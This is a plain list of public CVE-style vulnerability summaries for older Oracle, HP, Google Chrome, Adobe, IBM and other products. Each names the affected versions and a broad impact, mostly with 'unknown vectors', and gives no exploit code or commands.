Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, and 11.2.0.1 allows remote attackers to affect availability via unknown vectors.
Unspecified vulnerability in Kiwi before 3.74.2, as used in SUSE Studio 1.1 before 1.1.4, allows attackers to have an unknown impact via a crafted directory pathname that is inserted into config.sh.
Unspecified vulnerability in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before HP3 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, a different vulnerability than CVE-2011-2218.
Unspecified vulnerability in GroupWise Internet Agent (GWIA) in Novell GroupWise 8.0 before HP3 allows remote attackers to cause a denial of service (daemon crash) via unknown vectors, a different vulnerability than CVE-2011-2219.
Unspecified vulnerability in WalRack 1.x before 1.1.8 and 2.x before 2.0.6 has unknown impact and attack vectors, possibly related to file deletion and an encoded URL, a different vulnerability than CVE-2011-1329.
Unspecified vulnerability in the dbugs package in Google Chrome OS before R12 0.12.433.38 Beta has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in Adobe Photoshop before 12.0.4 have unknown impact and attack vectors.
Unspecified vulnerability in Virtualization Manager 1.2.2 in IBM Systems Director 1.2.2 has unknown impact and attack vectors.
Multiple unspecified vulnerabilities in FFmpeg 0.4.x through 0.6.x, as used in MPlayer 1.0 and other products, in Mandriva Linux 2009.0, 2010.0, and 2010.1; Corporate Server 4.0 (aka CS4.0); and Mandriva Enterprise Server 5 (aka MES5) have unknown impact and attack vectors, related to issues "originally discovered by Google Chrome developers."
Unspecified vulnerability in Adobe Reader and Acrobat before 10.1 on Windows and Mac OS X allows attackers to bypass intended access restrictions via unknown vectors.
Adobe LiveCycle Data Services 3.1 and earlier, LiveCycle 9.0.0.2 and earlier, and BlazeDS 4.0.1 and earlier do not properly restrict creation of classes during deserialization of (1) AMF and (2) AMFX data, which allows attackers to have an unspecified impact via unknown vectors, related to a "deserialization vulnerability."
Unspecified vulnerability in Adobe ColdFusion 8.0, 8.0.1, 9.0, and 9.0.1 allows remote attackers to cause a denial of service via unknown vectors.
Unspecified vulnerability in Google Chrome 11.0.696.65 on Windows 7 SP1 allows remote attackers to execute arbitrary code via unknown vectors.  NOTE: as of 20110510, the only disclosure is a vague advisory that possibly relates to multiple vulnerabilities or multiple products.  However, because it is from a well-known researcher, it is being assigned a CVE identifier for tracking purposes.
Multiple cross-site request forgery (CSRF) vulnerabilities in unspecified administrative modules in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allow remote attackers to hijack the authentication of administrators via unknown vectors.
An unspecified function in the web interface in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to execute arbitrary commands via unknown vectors, related to a "command injection" issue.
SQL injection vulnerability in an unspecified function in Proofpoint Messaging Security Gateway 6.2.0.263:6.2.0.237 and earlier in Proofpoint Protection Server 5.5.3, 5.5.4, 5.5.5, 6.0.2, 6.1.1, and 6.2.0 allows remote attackers to execute arbitrary SQL commands via unknown vectors.
Unspecified vulnerability in HP OpenView Storage Data Protector 6.0, 6.10, and 6.11 allows remote attackers to execute arbitrary code via unknown vectors.
HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allow remote authenticated users to conduct unspecified script injection attacks via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote attackers to modify data or obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote attackers to capture HTTP session credentials via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows local users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in HP Service Manager 7.02, 7.11, 9.20, and 9.21 and Service Center 6.2.8 allows remote authenticated users to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x allows local users to read or modify (1) log files or (2) other data via unknown vectors.
Use-after-free vulnerability in the image loader in Google Chrome before 12.0.742.91 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 12.0.742.91 does not properly implement history deletion, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the developer tools in Google Chrome before 12.0.742.91 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 12.0.742.91 attempts to read data from an uninitialized pointer, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 12.0.742.91 does not properly implement the framework for extensions, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Use-after-free vulnerability in the accessibility feature in Google Chrome before 12.0.742.91 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
rendering/RenderBox.cpp in WebCore in WebKit before r86862, as used in Google Chrome before 11.0.696.71, does not properly render floats, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Unspecified vulnerability in Google Chrome before 11.0.696.71 allows remote attackers to bypass the pop-up blocker via unknown vectors.
Multiple integer overflows in the SVG Filters implementation in WebCore in WebKit in Google Chrome before 11.0.696.68 allow remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 11.0.696.68 does not properly perform casts of variables during interaction with the WebKit engine, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
rendering/svg/RenderSVGText.cpp in WebCore in WebKit in Google Chrome before 11.0.696.65 does not properly perform a cast of an unspecified variable during an attempt to handle a block child, which allows remote attackers to cause a denial of service (application crash) or possibly have unknown other impact via a crafted text element in an SVG document.
Unspecified vulnerability in HP Network Automation 7.2x, 7.5x, 7.6x, 9.0, and 9.10 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Virtual Server Environment before 6.3 allows remote authenticated users to gain privileges via unknown vectors.
Unspecified vulnerability in the Mobility Pack 1.1.2 and earlier in Novell Data Synchronizer 1.0.x, and 1.1.x through 1.1.1 build 428, allows remote authenticated users to access the accounts of other users via unknown vectors.
IBM WebSphere Application Server (WAS) 6.0.x through 6.0.2.43, 6.1.x before 6.1.0.37, and 7.0.x before 7.0.0.17 on z/OS, when a Local OS user registry or Federated Repository with RACF adapter is used, allows remote attackers to obtain unspecified application access via unknown vectors.
Multiple cross-site request forgery (CSRF) vulnerabilities in phpList 2.10.13 and earlier allow remote attackers to hijack the authentication of administrators for requests that (1) create a list or (2) insert cross-site scripting (XSS) sequences.  NOTE: this issue exists because of an incomplete fix for CVE-2011-0748.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Metaways Tine 2.0 allows remote attackers to obtain sensitive information via unknown vectors in (1) Crm/Controller.php, (2) Crm/Export/Csv.php, or (3) Calendar/Model/Attender.php, which reveal the full installation path.
Cross-site request forgery (CSRF) vulnerability in the Translation Management module 6.x before 6.x-1.21 for Drupal allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
Unspecified vulnerability in the IBM Web Interface for Content Management (aka WEBi) 1.0.4 before FP3 has unknown impact and attack vectors.
SQL injection vulnerability in ICloudCenter ICJobSite 1.1 allows remote attackers to execute arbitrary SQL commands via the pid parameter to an unspecified component, a different vulnerability than CVE-2011-1546.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Cross-site request forgery (CSRF) vulnerability in HP Insight Control Performance Management before 6.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP Insight Control Performance Management before 6.3 allows remote authenticated users to gain privileges via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in HP Systems Insight Manager (SIM) before 6.3 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 6.3 allows remote attackers to bypass intended access restrictions, and consequently execute arbitrary code, via unknown vectors.
Unspecified vulnerability in HP System Management Homepage (SMH) before 6.3 allows remote authenticated users to execute arbitrary code via unknown vectors.
Unspecified vulnerability in HP Proliant Support Pack (PSP) before 8.7 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Performance Insight 5.0, 5.1x. 5.2x, 5.3x, 5.4, 5.41, and 5.41.002 allows remote attackers to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Insight Control for Linux (aka IC-Linux) before 6.3 allows remote authenticated users to obtain sensitive information, modify data, or cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x allows remote authenticated users to obtain access to processes via unknown vectors.
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Sun Products Suite 2.1.1 and 3.0.1 allows remote attackers to execute arbitrary code via unknown vectors related to Administration.
Unspecified vulnerability in IBM Lotus Quickr 8.1 before 8.1.0.27 services for Lotus Domino has unknown impact and attack vectors, aka SPR ESEO8DQME2.
Google Chrome before 11.0.696.57 does not properly handle PDF forms, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "stale pointers."
Google Chrome before 11.0.696.57 does not properly handle DOM id maps, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "dangling pointers."
Google Chrome before 11.0.696.57 does not properly present file dialogs, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "dangling pointers."
Use-after-free vulnerability in the WebSockets implementation in Google Chrome before 11.0.696.57 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 11.0.696.57 does not properly perform height calculations, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 11.0.696.57 does not properly handle drop-down lists, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Race condition in the sandbox launcher implementation in Google Chrome before 11.0.696.57 on Linux allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 11.0.696.57 does not properly implement layering, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "stale pointers."
Google Chrome before 11.0.696.57 does not properly handle mutation events, which allows remote attackers to cause a denial of service (node tree corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 11.0.696.57 does not properly perform a cast of an unspecified variable during handling of floating select lists, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted HTML document.
Google Chrome before 11.0.696.57 does not ensure thread safety during handling of MIME data, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Cross-site scripting (XSS) vulnerability in an unspecified Shockwave Flash file in EMC RSA Adaptive Authentication On-Premise (AAOP) 2.x, 5.7.x, and 6.x allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
EMC NetWorker 7.5.x before 7.5.4.3 and 7.6.x before 7.6.1.5, when the client push feature is enabled, uses weak permissions for an unspecified file, which allows local users to gain privileges via unknown vectors.
EMC Data Protection Advisor Collector 5.7 and 5.7.1 on Solaris SPARC platforms uses weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors.
The Research In Motion (RIM) BlackBerry Torch 9800 with firmware 6.0.0.246 allows attackers to read the contents of memory locations via unknown vectors, as demonstrated by Vincenzo Iozzo, Willem Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at CanSecWest 2011.
Unspecified vulnerability in IBM OpenPages GRC Platform 6.1.0.1 before IF4 allows remote attackers to bypass intended access restrictions via unknown vectors.
Unspecified vulnerability in IBM DB2 9.7 before FP5 on UNIX, when the Self Tuning Memory Manager (STMM) feature and the AUTOMATIC DATABASE_MEMORY setting are configured, allows local users to cause a denial of service (daemon crash) via unknown vectors.
Cross-site scripting (XSS) vulnerability in content/error.jsp in IBM WebSphere ILOG Rule Team Server 7.1.1 allows remote attackers to inject arbitrary web script or HTML via vectors that trigger an Unknown Error document, a different vulnerability than CVE-2011-4171.
The JavaServer Faces (JSF) application functionality in IBM WebSphere Application Server 8.x before 8.0.0.1 does not properly handle requests, which allows remote attackers to read unspecified files via unknown vectors.
Unspecified vulnerability in Adobe Reader 10.x before 10.1.1 on Windows allows local users to gain privileges via unknown vectors.
Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors, as demonstrated by Stephen Fewer as the second of three chained vulnerabilities during a Pwn2Own competition at CanSecWest 2011.
Unspecified vulnerability on the La Fonera+ router with firmware before 1.7.0.1 allows remote attackers to cause a denial of service via unknown vectors.
Cross-site request forgery (CSRF) vulnerability in EC-CUBE before 2.11.0 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.
Unspecified vulnerability in the Scratchpad application in Google Chrome OS before R10 0.10.156.46 Beta has unknown impact and attack vectors.
Google Chrome before 11.0.696.57 does not properly handle floating objects, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Heap-based buffer overflow in the GPU process in Google Chrome before 10.0.648.205 allows remote attackers to execute arbitrary code via unknown vectors.
Use-after-free vulnerability in the GPU process in Google Chrome before 10.0.648.205 allows remote attackers to execute arbitrary code via unknown vectors.
Google Chrome before 10.0.648.204 does not properly handle SVG text, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
WebKit, as used in Google Chrome before 10.0.648.204 and Apple Safari before 5.0.6, does not properly handle node parentage, which allows remote attackers to cause a denial of service (DOM tree corruption), conduct cross-site scripting (XSS) attacks, or possibly have unspecified other impact via unknown vectors.
Google Chrome before 10.0.648.204 does not properly handle Cascading Style Sheets (CSS) token sequences, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Use-after-free vulnerability in the HTMLCollection implementation in Google Chrome before 10.0.648.204 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Use-after-free vulnerability in the frame-loader implementation in Google Chrome before 10.0.648.204 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors.
Google Chrome before 10.0.648.204 does not properly handle base strings, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors, related to a "buffer error."
Integer overflow in WebKit, as used on the Research In Motion (RIM) BlackBerry Torch 9800 with firmware 6.0.0.246, in Google Chrome before 10.0.648.133, and in Apple Safari before 5.0.5, allows remote attackers to execute arbitrary code via unknown vectors related to CSS "style handling," nodesets, and a length value, as demonstrated by Vincenzo Iozzo, Willem Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at CanSecWest 2011.
Google V8, as used in Google Chrome before 10.0.648.127, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger incorrect access to memory.
The regular-expression functionality in Google Chrome before 10.0.648.127 does not properly implement reentrancy, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 10.0.648.127 does not properly handle SVG cursors, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
The context implementation in WebKit, as used in Google Chrome before 10.0.648.127, allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 10.0.648.127 does not properly perform a cast of an unspecified variable during text rendering, which allows remote attackers to cause a denial of service or possibly have unknown other impact via a crafted document.
Google Chrome before 10.0.648.127 does not properly handle DataView objects, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
The video functionality in Google Chrome before 10.0.648.127 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger use of a malformed "out-of-bounds structure."
Google Chrome before 10.0.648.127 does not properly perform table painting, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
The OGG container implementation in Google Chrome before 10.0.648.127 allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that trigger an out-of-bounds write.
Multiple unspecified vulnerabilities in Google Chrome before 10.0.648.127 allow remote attackers to bypass the pop-up blocker via unknown vectors.
Google Chrome before 10.0.648.127 does not properly perform box layout, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale node."
Google Chrome before 10.0.648.127 does not properly handle counter nodes, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via unknown vectors.
SSI.php in Simple Machines Forum (SMF) before 1.1.13, and 2.x before 2.0 RC5, does not properly restrict guest access, which allows remote attackers to have an unspecified impact via unknown vectors.
Google Chrome before 9.0.597.107 does not properly perform layout, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.107 does not properly determine device orientation, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.107 does not properly handle XHTML documents, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to "stale nodes."
Google Chrome before 9.0.597.107 does not properly handle SVG animations, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.107 does not properly render tables, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.107 does not properly handle tables, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale node."
Google Chrome before 9.0.597.107 does not properly perform SVG rendering, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 9.0.597.107 does not properly implement forms controls, which allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via unknown vectors.
Google Chrome before 9.0.597.107 does not properly implement key frame rules, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.107 does not properly process nodes in Cascading Style Sheets (CSS) stylesheets, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Unspecified vulnerability in Google Chrome before 9.0.597.107 allows remote attackers to spoof the URL bar via unknown vectors.
Multiple unspecified vulnerabilities in a third-party component of the Citrix Licensing Administration Console 11.6, formerly License Management Console, allow remote attackers to (1) access unauthorized "license administration functionality" or (2) cause a denial of service via unknown vectors.
Unspecified vulnerability in the PEF input file loader in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors.
Integer overflow in the PSX/GEOS input file loaders in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors related to memory allocation.
Integer overflow in the COFF/EPOC/EXPLOAD input file loaders in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors related to memory allocation.
Unspecified vulnerability in Hex-Rays IDA Pro 5.7 and 6.0 has unknown impact and attack vectors related to "converson of string encodings" and "inconsistencies in the handling of UTF8 sequences by the user interface."
Unspecified vulnerability in the Rendition Engine (aka P8RE) 4.0.1 through 4.5.1 in IBM FileNet P8 Content Manager (CM) allows remote attackers to gain privileges via unknown vectors.
A vulnerability was found in GamerZ WP-PostRatings up to 1.64. It has been classified as problematic. This affects an unknown part of the file wp-postratings.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.65 is able to address this issue. The identifier of the patch is 6182a5682b12369ced0becd3b505439ce2eb8132. It is recommended to upgrade the affected component. The identifier VDB-259629 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in EasyFTP 1.7.0.2. Affected is an unknown function of the component MKD Command Handler. The manipulation leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250716.
A vulnerability was found in reciply Plugin up to 1.1.7 on WordPress. It has been rated as critical. This issue affects some unknown processing of the file uploadImage.php. The manipulation leads to unrestricted upload. The attack may be initiated remotely. Upgrading to version 1.1.8 is able to address this issue. The identifier of the patch is e3ff616dc08d3aadff9253f1085e13f677d0c676. It is recommended to upgrade the affected component. The identifier VDB-242189 was assigned to this vulnerability.
A vulnerability was found in XpressEngine up to 1.4.4. It has been rated as critical. This issue affects some unknown processing of the component Update Query Handler. The manipulation leads to sql injection. Upgrading to version 1.4.5 is able to address this issue. The patch is named c6e94449f21256d6362450b29c7847305e756ad5. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220247.
A vulnerability was found in iamdroppy phoenixcf. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file content/2-Community/articles.cfm. The manipulation leads to sql injection. The patch is named d156faf8bc36cd49c3b10d3697ef14167ad451d8. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218491.
The sqlite3-ruby gem in the rubygem-sqlite3 package before 1.2.4-0.5.1 in SUSE Linux Enterprise (SLE) 11 SP1 uses weak permissions for unspecified files, which allows local users to gain privileges via unknown vectors.
Google Chrome before 9.0.597.94 does not properly handle anonymous blocks, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Google Chrome before 9.0.597.94 does not properly perform event handling for animations, which allows remote attackers to cause a denial of service or possibly have unspecified other impact via unknown vectors that lead to a "stale pointer."
Multiple stack-based buffer overflows in the tsc_launch_remote function (src/support.c) in Terminal Server Client (tsclient) 0.150, and possibly other versions, allow user-assisted remote attackers to execute arbitrary code via a .RDP file with a long (1) username, (2) password, or (3) domain argument.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.00 allows local users to read arbitrary files via unknown vectors.
Unspecified vulnerability in HP NFS/ONCplus B.11.31.10 and earlier on HP-UX B.11.31 allows remote authenticated users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Network Node Manager i (NNMi) 9.0x and 8.1x allows remote authenticated users to obtain sensitive information via unknown vectors.
Unspecified vulnerability in HP Operations 9.10 on UNIX platforms allows remote authenticated users to bypass intended access restrictions via unknown vectors.
Cross-site scripting (XSS) vulnerability in HP Diagnostics 7.5x and 8.0x before 8.05.54.225 allows remote attackers to inject arbitrary web script or HTML via unknown vectors.
Unspecified vulnerability in the OS-Core.CORE2-KRN fileset in HP HP-UX B.11.23 and B.11.31 allows local users to cause a denial of service via unknown vectors.
Unspecified vulnerability in HP Client Automation Enterprise (aka HPCA or Radia Notify) 5.11, 7.2, 7.5, 7.8, and 7.9 allows remote attackers to execute arbitrary code via unknown vectors.
Unspecified vulnerability in the Content Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, and 11.1.0.7; and Oracle Enterprise Manager Grid Control 10.1.0.6, 10.2.0.5, and 11.1.0.1; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Scheduler.
Unspecified vulnerability in the EMCTL component in Oracle Database Server 10.2.0.3, 10.2.0.4, and 11.1.0.7, and Oracle Enterprise Manager Grid Control 10.1.0.6, allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Core RDBMS component in Oracle Database Server 11.1.0.7, 11.2.0.1, and 11.2.0.2 allows remote authenticated users to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than CVE-2011-0832 and CVE-2011-0835.
Unspecified vulnerability in the Instance Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Instance Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, and 10.2.0.4, and Oracle Enterprise Manager Grid Control 10.1.0.6, allows remote attackers to affect integrity via unknown vectors.
Unspecified vulnerability in the Enterprise Manager Console component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote attackers to affect integrity via unknown vectors related to Security.
Unspecified vulnerability in the EMCTL component in Oracle Database Server 11.1.0.7 and Oracle Enterprise Manager Grid Control 10.1.0.6, 10.2.0.5, and 11.1.0.1 allows remote authenticated users to affect confidentiality and integrity via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, and 5.0 Update 29 and earlier, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier allows remote attackers to affect availability via unknown vectors related to NIO.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Swing.
Unspecified vulnerability in the Schema Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.1, and 11.2.0.2; and Oracle Enterprise Manager Grid Control 10.1.0.6 and 10.2.0.5; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 26 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to SAAJ.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier allows remote attackers to affect confidentiality via unknown vectors related to 2D.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality via unknown vectors related to Networking.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier, when running on Windows, allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Java Runtime Environment.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect integrity via unknown vectors related to Deserialization.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to HotSpot.
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier allows remote untrusted Java Web Start applications and untrusted Java applets to affect confidentiality, integrity, and availability via unknown vectors related to Deployment.
Multiple unspecified vulnerabilities in the Java Runtime Environment (JRE) component in Oracle Java SE 6 Update 25 and earlier, 5.0 Update 29 and earlier, and 1.4.2_31 and earlier allow remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Update 2011-B and 9.1 Update 2011-B allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Global Payroll Core.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Update 2011-B and 9.1 Update 2011-B allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Global Payroll - Spain.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Tax Update 11-B and 9.1 Tax Update 11-B allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Global Payroll - North America.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Bundle #15 and 9.1 Bundle #5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Talent Acquisition Manager.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Bundle #15 and 9.1 Bundle #5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Pension Administration.
Unspecified vulnerability in Oracle PeopleSoft Enterprise 8.49 GA through 8.49.30, 8.50 GA through 8.50.17, and 8.51 GA through 8.51.07 allows remote authenticated users to affect confidentiality via unknown vectors.
Unspecified vulnerability in the InForm component in Oracle Industry Applications 4.5, 4.6, and 5.0 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Core.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.1 Bundle #5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to ePerformance.
Unspecified vulnerability in Oracle PeopleSoft Enterprise HRMS 9.0 Bundle #15 and 9.1 Bundle #5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to ePerformance.
Unspecified vulnerability in the Security Management component in Oracle Database Server 10.1.0.5, 10.2.0.3, and 10.2.0.4; and Oracle Enterprise Manager Grid Control 10.1.0.6; allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to Audit Administration.
Unspecified vulnerability in Oracle PeopleSoft Enterprise ELS 9.0 Bundle #19 and 9.1 Bundle #5 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Enterprise Learning Mgmt.
Unspecified vulnerability in Oracle PeopleSoft Enterprise CRM 8.9 Bundle #41 allows remote authenticated users to affect confidentiality and integrity via unknown vectors related to Order Capture.
